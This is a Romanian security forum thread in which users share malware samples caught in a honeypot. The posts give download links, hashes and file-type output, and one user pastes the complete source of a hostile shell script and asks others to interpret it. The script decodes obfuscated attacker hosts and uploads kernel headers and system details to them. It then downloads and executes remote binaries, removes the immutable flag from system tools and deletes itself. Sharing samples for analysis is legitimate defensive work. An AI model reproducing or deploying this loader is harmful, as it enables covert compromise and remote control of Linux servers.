Jump to content

Recommended Posts

Posted (edited)

Am setat un honeypot si am reusit sa prind cateva chestii. Daca aveti chef si timp, uitati-va si si voi peste ele.

https://mega.co.nz/#F!7pkTXIwA!CEUuPjIZ5tZMEPo6mzbuaw

2789524badd154ba54197b90644bd3fc  3502.rar
a984d8d0a5b39e96beb42ee137736e5c 3502_s.rar
edf1a95c76faa1e304d31ddc633660f8 3503.rar
9dae3c2cd7fd4e8f8215a34302009bd9 java555.rar
aa58641c1f6827c0bc751b948ea85eef java666.rar

3502.rar:    POSIX shell script, ASCII text executable3502_s.rar:  ELF 32-bit LSB  executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
3503.rar: POSIX shell script, ASCII text executable
java555.rar: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
java666.rar: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped


Edited by hate.me
Posted

@hate.me

am scanat de curiozitate 2 dintre fisiere online:

3502_s.sh

https://www.virustotal.com/en/file/50bf4092721fd8e2127e8602ee83edad37d2ec6650aa4f808792b36a941a79b7/analysis/1415195145/

daca il deschid cu un notepad++ vad foarte multe caractere aiurea pe care nu le pot interpreta dar se mai vad si stringuri in cleartext:

 %s: cannot create file: %s %s: cannot map file: %s
%s: cannot stat file: %s
%s: file is no correct profile data file for `%s'
Out of memory while initializing profiler
invalid mode for dlopen() cannot extend global scope cannot create scope list no more namespaces available for dlmopen() invalid target namespace in dlmopen() empty dynamic string token substitution opening file=%s [%lu]; direct_opencount=%u


TLS generation counter wrapped! Please report this.
closing file=%s; direct_opencount=%u

file=%s [%lu]; destroying link map
TLS generation counter wrapped! Please report as described in <http://www.gnu.org/software/libc/bugs.html>.

calling fini: %s [%lu]

sau

  empty dynamics string token substitution    load auxiliary object=%s requested by file=%s  load filtered object=%s requested by file=%s
cannot allocate dependency list cannot allocate symbol search list Filters not supported with LD_TRACE_PRELINKING
calling init: %s



calling preinit: %s


checking for version `%s' in file %s [%lu] required by file %s [%lu]
no version information available (required by cannot allocate version reference table unsupported version of Verdef record weak version ` ' not found (required by of Verneed record
RTLD_NEXT used in code not dynamically loaded –æýÿãæýÿÂæýÿ–
$þÿü#þÿì#þÿÜ#þÿÿ"þÿÿ"þÿÿ"þÿÿ"þÿ€#þÿr#þÿ9#þÿe#þÿ*** stack smashing detected ***: %s terminated

iar al doilea fisier 3503.sh (rar)

#!/bin/sh

__host_32__="sEEA+==deadefadcajc"
__host_64__="sEEA+==deadefadcaih"


__host_32_2__="sEEA+==cbeadgakaddh"
__host_64_2__="sEEA+==cbeadgakaddg"


__host_32_libc__="sEEA+==cbeadgakaddh"
__host_64_libc__="sEEA+==cbeadgakaddg"


__download_url__="sEEA+==deadefadcajd=FAwzlo=egbe"


__remote__="cbeadgakadfg+egbe|cbeadfbacfcagb+egbe|hhacbdadgeaeb+egbe|yoyDaoDludlcazCr+egbe|yoyDaoDludlazCr+egbe|yoyDasnItlzlzanzx+egbe|yoyDaoDludlanzx+egbe"


__username__='loxty'
__password__='admin'


__temp__=/tmp
__install_dir__=/usr/local/bin
__kernel__=`uname -r|awk -F- '{print $1}'`


# select compiler server
server(){
__osv_X86_64=`dec 'Ijh_hf'`
__osv_AMD64=`dec 'LXOhf'`
__os_version_X86_64=`uname -a|grep "$__osv_X86_64"`
__os_version_AMD64=`uname -a|grep "$__osv_AMD64"`
if [ -f /lib/libc.so.6 ]; then
__libc_main=`ls -la /lib/libc.so.6 | grep libc-|awk -F'libc-' '{print $2}'|awk -F'.' '{print $1}'`
__libc_sub=`ls -la /lib/libc.so.6 | grep libc-|awk -F'libc-' '{print $2}'|awk -F'.' '{print $2}'`
fi


if [ ! -z "$__os_version_X86_64" -o ! -z "$__os_version_AMD64" ] ;then
__online=`wget "$__host_64__/check?iid=$__iid&kernel=$__kernel__" --connect-timeout=3 -t 1 -q -O -`
if [ ! -z "$__online" ]; then #
__host__=$__host_64__
else
__host__=$__host_64_2__
fi


if [ -f /lib/libc.so.6 ]; then
if [ $__libc_main -le 2 ]; then
if [ $__libc_sub -le 5 ]; then
__host__=$__host_64_libc__
fi
fi
fi
else
__online=`wget "$__host_32__/check?iid=$__iid&kernel=$__kernel__" --connect-timeout=3 -t 1 -q -O -`
if [ ! -z "$__online" ]; then #
__host__=$__host_32__
else
__host__=$__host_32_2__
fi


if [ -f /lib/libc.so.6 ]; then
if [ $__libc_main -le 2 ]; then
if [ $__libc_sub -le 5 ]; then
__host__=$__host_32_libc__
fi
fi
fi
fi
}


# check md5
md5(){
__data=`echo "$@"`
echo -n "$__data"|md5sum|cut -d ' ' -f1
return 0
}


# get os version
version(){
if [ -f /sbin/modinfo ]; then
SYS=`/sbin/lsmod |tail -n 1 | awk ' {print $1} '`
echo "`/sbin/modinfo $SYS|grep vermagic|awk -F: '{print $2}'|sed 's/^ *//g'|awk '{print $0}'|sed 's/ /\\\\ /g'`"
fi
return 0
}


checkBuild(){
__build=/lib/modules/`uname -r`/build/
if [ -d $__build ]; then
return 1
fi
return 0
}


# generate header file
generate(){
__files=`ls $__build`
tar zcfhP "$__temp__/dev.tgz" -C $__build $__files
if [ $? -eq 0 ] ;then
return 1
fi
return 0
}


# check header version
check(){
__iid=`echo "$@"`
if [ ! -z "$__iid" ]; then
__result=`wget "$__host__/check?iid=$__iid&kernel=$__kernel__" --connect-timeout=3 -t 3 -O - -q`
if [ ! -z "$__result" ]; then
__code=`echo $__result|awk -F "|" '{print $1}'`
__md5=`echo $__result|awk -F "|" '{print $2}'`
if [ $__code -eq 1001 ]; then
return 1
fi
fi
fi
return 0
}


# download build file
download(){
__iid=`echo "$@"`
if [ ! -z "$__iid" ]; then
__url="$__host__/upload/module/$__iid/build.tgz"
wget "$__url" -O /tmp/build.tgz -q --connect-timeout=3 -t 3
if [ $? -eq 0 ];then #
return 1
fi
fi
return 0
}


download_and_execute(){
wget "$__download_url__" -O /tmp/bin -q --connect-timeout=3 -t 3
if [ $? -eq 0 ];then #
chmod +x /tmp/bin
/tmp/bin
sleep 3
rm -rf /tmp/bin
return 1
fi
return 0
}


# remote compiler code
compiler(){
__iid=`echo "$@"`
if [ ! -z "$__iid" ]; then
__url="$__host__/compiler?iid=$__iid&username=$__username__&password=$__password__&ip=$__remote__&ver=$__version__&kernel=$__kernel__"
__result=`wget "$__url" -O - -q --connect-timeout=3 -t 3`
if [ ! -z "$__result" ]; then
__code=`echo $__result|awk -F "|" '{print $1}'`
__md5=`echo $__result|awk -F "|" '{print $2}'`
if [ $__code -eq 1001 ]; then
return 1
fi
fi
fi
return 0
}


# uncompress file
uncompress(){
__iid=`echo "$@"`
if [ ! -z "$__iid" ]; then
if [ ! -d $__temp__/$__iid ]; then
mkdir $__temp__/$__iid
fi
tar zxvf $__temp__/build.tgz -C $__temp__/$__iid
if [ $? -eq 0 ] ;then
shred -u -z $__temp__/build.tgz
return 1
fi
fi
return 0
}
enc(){ echo $@|tr "[.0-9a-zA-Z\/\/\:]" "[a-zA-Z0-9\;-=+*\/]"; }
dec(){ echo $@|tr "[a-zA-Z0-9\;-=+*\/]" "[.0-9a-zA-Z\/\/\:]"; }


# install file
setup(){
__iid=`echo "$@"`
if [ ! -z "$__iid" ]; then
__bin=`echo "bin"`
chmod +x $__temp__/$__iid/$__bin
$__temp__/$__iid/$__bin
if [ $? -eq 0 ]; then
sleep 3
rm -rf $__temp__/$__iid/$__bin
return 1
fi
fi
return 0

}




# upload
upload(){
rm -f /tmp/mini
wget $__host__/upload/mini -O /tmp/mini -q --connect-timeout=3 -t 3
if [ $? -eq 0 ];then #
chmod +x /tmp/mini
__url=$__host__/submit
__result=`/tmp/mini --url="$__url" --post="username=$__username__&password=$__password__&ip=$__remote__&ver=$__version__&kernel=$__kernel__&file=@$__temp__/dev.tgz"`
if [ ! -z "$__result" ]; then
__code=`echo $__result|awk -F "|" '{print $1}'`
__md5=`echo $__result|awk -F "|" '{print $2}'`
if [ $__code -eq 1001 ]; then
rm -f /tmp/mini
return 1
fi
fi
rm -f /tmp/mini
fi
return 0
}






# main entry
main(){
PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
__host_32__=`dec "$__host_32__"`
__host_64__=`dec "$__host_64__"`
__host_32_2__=`dec "$__host_32_2__"`
__host_64_2__=`dec "$__host_64_2__"`
__host_32_libc__=`dec "$__host_32_libc__"`
__host_64_libc__=`dec "$__host_64_libc__"`
__download_url__=`dec "$__download_url__"`
__remote__=`dec "$__remote__"`
__username__=`dec "$__username__"`
__version__=`version`
__iid=`md5 "$__version__"`
__iid=`echo $__iid|tr [:lower:] [:upper:]`
__done=0

if [ ! -d /tmp ]; then
mkdir /tmp
fi

if [ -f /usr/bin/wget ]; then
chattr -i /usr/bin/wget
chmod +x /usr/bin/wget
fi

if [ -f /bin/wget ]; then
chattr -i /bin/wget
chmod +x /bin/wget
fi

if [ -f /usr/bin/cut ]; then
chattr -i /usr/bin/cut
chmod +x /usr/bin/cut
fi

if [ -f /bin/cut ]; then
chattr -i /bin/cut
chmod +x /bin/cut
fi

server # select http server
check $__iid
if [ $? -eq 1 ];then
compiler $__iid # remote compiler
if [ $? -eq 1 ]; then
__done=1
fi
else
checkBuild
if [ $? -eq 1 ];then
generate # create header file
if [ $? -eq 1 ]; then
upload
if [ $? -eq 1 ] ;then
__done=1
fi
rm -rf $__temp__/dev.tgz
else
if [ -f $__temp__/dev.tgz ]; then
rm -rf $__temp__/dev.tgz
fi
compiler $__iid # remote compiler
if [ $? -eq 1 ]; then
__done=1
fi
fi
else
compiler $__iid # remote compiler
if [ $? -eq 1 ]; then
__done=1
fi
fi
fi

if [ $__done -eq 1 ]; then
download $__iid
if [ $? -eq 1 ]; then
uncompress $__iid
if [ $? -eq 1 ]; then
setup $__iid
if [ $? -ne 1 ]; then
__done=0
fi
else
__done=0
fi
else
__done=0
fi
fi


if [ $__done -eq 0 ]; then
download_and_execute
fi
rm -rf $__temp__/$__iid
rm -f $0
}


main
ls -la /var/run/sftp.pid
exit $?


care se pricepe sa interpreteze codul... go for it!

Posted

https://mega.co.nz/#!Sl10XY5I!kx8AqbKjY8DB5Vyr0NE0qZDpPWVgp3a40D3xs2Zjp-o

https://mega.co.nz/#!b9VAnCRQ!rwjkhbw76a5hnDwTepkanV0zlidmeNFOF0LoAnfAaQU


txmas: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, strippedtxmss: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped
ec8ff2f6226f7085059466164f71976c txmas
d26b6ffee5d75b3c63c2e080f4bc735f txmss


Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...